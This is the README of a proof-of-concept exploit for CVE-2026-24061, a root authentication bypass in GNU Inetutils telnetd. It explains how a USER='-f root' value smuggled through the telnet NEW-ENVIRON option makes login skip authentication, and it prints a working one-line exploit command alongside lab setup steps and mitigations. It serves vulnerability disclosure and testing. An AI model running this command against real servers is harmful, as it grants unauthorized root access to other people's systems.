## https://sploitus.com/exploit?id=1D9206CE-65DC-545E-A96E-2EF93A7EC9BA
# CVE-2026-24061
## GNU Inetutils telnetd Remote Authentication Bypass
> **Seriously, telnet in 2026? Come on guys, it's time to move on. SSH exists since 1995.** ๐คฆ
### Description
A critical authentication bypass vulnerability in GNU Inetutils telnetd affecting versions 1.9.3 through 2.7.
The vulnerability exploits the NEW-ENVIRON telnet option to inject malicious arguments into `login(1)`. By setting `USER=-f root` via the telnet protocol, an attacker can bypass authentication and obtain a root shell without credentials.
### Affected Versions
- GNU Inetutils 1.9.3 - 2.7
### Technical Details
The telnet protocol supports the NEW-ENVIRON option (RFC 1572) which allows the client to send environment variables to the server. The `telnetd` daemon passes the USER variable to `login(1)` as an argument.
By sending `USER=-f root`, the value is interpreted as:
- `-f` flag: Skip authentication (trusted host)
- `root`: Target user
This causes `login -f root` to be executed, granting immediate root access.
The PoC detects successful exploitation by checking for `IAC WILL ECHO` (0xff 0xfb 0x01) - the protocol signal that the server sends when shell access is granted.
### Lab Setup
```bash
# Build and run the vulnerable telnetd container
docker compose up --build -d
# Test the exploit
go run poc.go 127.0.0.1 2323
```
### Exploitation
```bash
# Using the Go PoC (with interactive shell)
go run poc.go
# Simple PoC using standard telnet client
env USER='-f root' telnet -a
```
### Mitigation
- **Stop using telnet in 2026, for real** ๐
- Use SSH instead (it's been around for 31 years now, I wasn't even born in '95 lol)
- Upgrade to a patched version of GNU Inetutils
- Restrict telnet access via firewall rules
### Files
- `poc.go` - Go exploit with interactive shell
- `Dockerfile` - Vulnerable telnetd container
- `docker-compose.yml` - Lab orchestration
### References
- Advisory: https://www.openwall.com/lists/oss-security/2026/01/20/2
- GNU Inetutils: https://www.gnu.org/software/inetutils/
- RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572
### Credits
- LeakIX Research Team